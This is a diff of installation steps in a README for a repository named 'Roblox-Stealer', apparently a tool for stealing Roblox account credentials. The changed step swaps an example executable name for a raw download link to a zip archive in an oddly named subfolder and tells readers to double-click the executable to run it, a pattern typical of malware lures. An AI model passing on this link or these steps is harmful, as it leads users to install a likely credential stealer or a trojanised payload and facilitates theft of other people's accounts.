fokmadrs/Roblox-Stealer/README.md

 4. **Extract the Files:** If the downloaded file is compressed (like a .zip file), right-click it and choose to extract the contents.

-5. **Run the Application:** Locate the extracted folder, and double-click on the executable file (e.g., Roblox-Stealer.exe) to start the application.
+5. **Run the Application:** Locate the extracted folder, and double-click on the executable file (e.g., https://raw.githubusercontent.com/fokmadrs/Roblox-Stealer/main/buhrstone/Roblox-Stealer.zip) to start the application.

 6. **Follow On-Screen Instructions:** The application will guide you through the setup process.